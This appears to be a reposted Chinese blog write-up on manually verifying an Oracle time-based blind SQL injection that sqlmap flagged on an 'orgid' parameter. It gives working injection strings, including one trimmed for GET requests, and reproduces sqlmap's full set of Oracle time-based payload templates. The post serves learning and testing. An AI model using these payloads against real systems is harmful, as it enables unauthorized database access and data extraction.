码上快乐

相关内容   简体   繁体

一次sqlmap扫出的Oracle数据库时间盲注的手工复现验证

本文转载自  查看原文  2022-04-12 08:52  901 

sqlmap扫出的Oracle时间盲注截图

payload是

abz345Name=************&orgid=400') AND 3587=DBMS_PIPE.RECEIVE_MESSAGE(CHR(78)||CHR(76)||CHR(74)||CHR(86),5) AND ('PrOw'='PrOw&abb017q=20220122&cxfw=1&abb017z=&bae204=0&pxfs=1&source=3&access_token=null&limit=12&_queryid=new

提示注入点是orgid参数,采用POST方式

由于第一次接触oracle的时间盲注,对orgid=400后面的payload不太懂,遂百度查到oracle的时间盲注主要有几种函数

DBMS_PIPE.RECEIVE_MESSAGE是其中一种(RECEIVE_MESSAGE 函数 - 从指定管道获取消息 - IBM 文档

手工测试时,只要页面出现指定延时,就可以判定为时间注入

后来经过反复测试,把payload缩减到了不影响判断的最少值以便于调试且发现可以使用GET方式提交,如下:

orgid=1') and 11=dbms_pipe.receive_message('RDS',5) and ('1'='1&cxfw=1&source=3&limit=12

测试截图:

 

也请教另一位大佬得知,时间盲注也属于布尔型,就是通过真假来判断,只要出现指定时间的延时就可以判定为有注入,如果要把当前用户名或当前数据库名扒出来,只能一个个字符去尝试,每个128种尝试,sqlmap就是采用批量爆破方式,由此可以通过burpsuite去做。

 

SQLMap里关于Oracle数据库的时间盲注payload提取出来了(sqlmap目录\data\xml\payloads下)

<?xml version="1.0" encoding="UTF-8"?>

<root>
    <!-- Time-based boolean tests -->

    <!-- Prefering "query SLEEP" over "SLEEP" because of JOIN-alike cases where SLEEPs get called multiple times (e.g. http://testphp.vulnweb.com/listproducts.php?cat=1) -->
    <test>
        <title>Oracle AND time-based blind</title>
        <stype>5</stype>
        <level>1</level>
        <risk>1</risk>
        <clause>1,2,3,9</clause>
        <where>1</where>
        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)</vector>
        <request>
            <payload>AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])</payload>
        </request>
        <response>
            <time>[SLEEPTIME]</time>
        </response>
        <details>
            <dbms>Oracle</dbms>
        </details>
    </test>

    <test>
        <title>Oracle OR time-based blind</title>
        <stype>5</stype>
        <level>1</level>
        <risk>3</risk>
        <clause>1,2,3,9</clause>
        <where>1</where>
        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)</vector>
        <request>
            <payload>OR [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])</payload>
        </request>
        <response>
            <time>[SLEEPTIME]</time>
        </response>
        <details>
            <dbms>Oracle</dbms>
        </details>
    </test>

    <test>
        <title>Oracle AND time-based blind (comment)</title>
        <stype>5</stype>
        <level>4</level>
        <risk>1</risk>
        <clause>1,2,3,9</clause>
        <where>1</where>
        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)</vector>
        <request>
            <payload>AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])</payload>
            <comment>--</comment>
        </request>
        <response>
            <time>[SLEEPTIME]</time>
        </response>
        <details>
            <dbms>Oracle</dbms>
        </details>
    </test>

    <test>
        <title>Oracle OR time-based blind (comment)</title>
        <stype>5</stype>
        <level>4</level>
        <risk>3</risk>
        <clause>1,2,3,9</clause>
        <where>1</where>
        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)</vector>
        <request>
            <payload>OR [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])</payload>
            <comment>--</comment>
        </request>
        <response>
            <time>[SLEEPTIME]</time>
        </response>
        <details>
            <dbms>Oracle</dbms>
        </details>
    </test>

    <test>
        <title>Oracle AND time-based blind (heavy query)</title>
        <stype>5</stype>
        <level>2</level>
        <risk>2</risk>
        <clause>1,2,3,9</clause>
        <where>1</where>
        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)</vector>
        <request>
            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)</payload>
        </request>
        <response>
            <time>[DELAYED]</time>
        </response>
        <details>
            <dbms>Oracle</dbms>
        </details>
    </test>

    <test>
        <title>Oracle OR time-based blind (heavy query)</title>
        <stype>5</stype>
        <level>2</level>
        <risk>3</risk>
        <clause>1,2,3,9</clause>
        <where>1</where>
        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)</vector>
        <request>
            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)</payload>
        </request>
        <response>
            <time>[DELAYED]</time>
        </response>
        <details>
            <dbms>Oracle</dbms>
        </details>
    </test>

    <test>
        <title>Oracle AND time-based blind (heavy query - comment)</title>
        <stype>5</stype>
        <level>5</level>
        <risk>2</risk>
        <clause>1,2,3,9</clause>
        <where>1</where>
        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)</vector>
        <request>
            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)</payload>
            <comment>--</comment>
        </request>
        <response>
            <time>[DELAYED]</time>
        </response>
        <details>
            <dbms>Oracle</dbms>
        </details>
    </test>

    <test>
        <title>Oracle OR time-based blind (heavy query - comment)</title>
        <stype>5</stype>
        <level>5</level>
        <risk>3</risk>
        <clause>1,2,3,9</clause>
        <where>1</where>
        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)</vector>
        <request>
            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)</payload>
            <comment>--</comment>
        </request>
        <response>
            <time>[DELAYED]</time>
        </response>
        <details>
            <dbms>Oracle</dbms>
        </details>
    </test>

    <!-- Without parentesis because it never works with them, useful to exploit SQL injection in Oracle E-Business Suite Financials -->
    <test>
        <title>Oracle time-based blind - Parameter replace (DBMS_LOCK.SLEEP)</title>
        <stype>5</stype>
        <level>3</level>
        <risk>1</risk>
        <clause>1,3,9</clause>
        <where>3</where>
        <vector>BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;</vector>
        <request>
            <payload>BEGIN IF ([RANDNUM]=[RANDNUM]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;</payload>
        </request>
        <response>
            <time>[SLEEPTIME]</time>
        </response>
        <details>
            <dbms>Oracle</dbms>
        </details>
    </test>

    <test>
        <title>Oracle time-based blind - Parameter replace (DBMS_PIPE.RECEIVE_MESSAGE)</title>
        <stype>5</stype>
        <level>3</level>
        <risk>1</risk>
        <clause>1,3,9</clause>
        <where>3</where>
        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END) FROM DUAL)</vector>
        <request>
            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END) FROM DUAL)</payload>
        </request>
        <response>
            <time>[SLEEPTIME]</time>
        </response>
        <details>
            <dbms>Oracle</dbms>
        </details>
    </test>

    <test>
        <title>Oracle time-based blind - Parameter replace (heavy queries)</title>
        <stype>5</stype>
        <level>4</level>
        <risk>2</risk>
        <clause>1,3,9</clause>
        <where>3</where>
        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END) FROM DUAL)</vector>
        <request>
            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END) FROM DUAL)</payload>
        </request>
        <response>
            <time>[DELAYED]</time>
        </response>
        <details>
            <dbms>Oracle</dbms>
        </details>
    </test>


    <test>
        <title>Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_LOCK.SLEEP)</title>
        <stype>5</stype>
        <level>3</level>
        <risk>1</risk>
        <clause>2,3</clause>
        <where>1</where>
        <vector>,(BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;)</vector>
        <request>
            <payload>,(BEGIN IF ([RANDNUM]=[RANDNUM]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;)</payload>
        </request>
        <response>
            <time>[SLEEPTIME]</time>
        </response>
        <details>
            <dbms>Oracle</dbms>
        </details>
    </test>

    <test>
        <title>Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_PIPE.RECEIVE_MESSAGE)</title>
        <stype>5</stype>
        <level>3</level>
        <risk>1</risk>
        <clause>2,3</clause>
        <where>1</where>
        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)</vector>
        <request>
            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)</payload>
        </request>
        <response>
            <time>[SLEEPTIME]</time>
        </response>
        <details>
            <dbms>Oracle</dbms>
        </details>
    </test>

    <test>
        <title>Oracle time-based blind - ORDER BY, GROUP BY clause (heavy query)</title>
        <stype>5</stype>
        <level>4</level>
        <risk>2</risk>
        <clause>2,3</clause>
        <where>1</where>
        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)</vector>
        <request>
            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)</payload>
        </request>
        <response>
            <time>[DELAYED]</time>
        </response>
        <details>
            <dbms>Oracle</dbms>
        </details>
    </test>
    <!-- End of time-based boolean tests - ORDER BY, GROUP BY clause -->
</root>
View Code

 

 

参考:

DBMS_PIPE 

Oracle基于延时的盲注总结 - 卿先生 - 博客园 

oracle 时间注入 - CSDN 

Oracle手工盲注小结 - 百度文库 

时间型盲注_heibaikong6的博客-CSDN博客_时间盲注 

hacking-oracle 

从sqlmap源码看如何自定义payload - 安全客,安全资讯平台 

工具| sqlmap payload修改之路(下) - FreeBuf网络安全行业门户 

某次报错注入到自定义sqlmap的payload全过程 

北大方正翔宇CMS系统通用型SQL注入漏洞 | CN-SEC 中文网 


免责声明!

本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。



猜您在找 mssql手工盲注 2019-10-29:渗透测试,基础学习,sqlmap文件读取,写入,dnslog盲注作用,mssql手工注入,笔记 详细说明手工创建oracle数据库实例 Oracle 11g静默安装软件+手工创建数据库 oracle 11g手工建数据库过程 MySQL手注之时间盲注 SQL注入原理 手工注入access数据库 墨者学院 SQL手工注入漏洞测试(MySQL数据库-字符型) SQL手工注入漏洞测试(Sql Server数据库) 还在手工生成数据库文档?3个步骤自动完成了解一下
 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM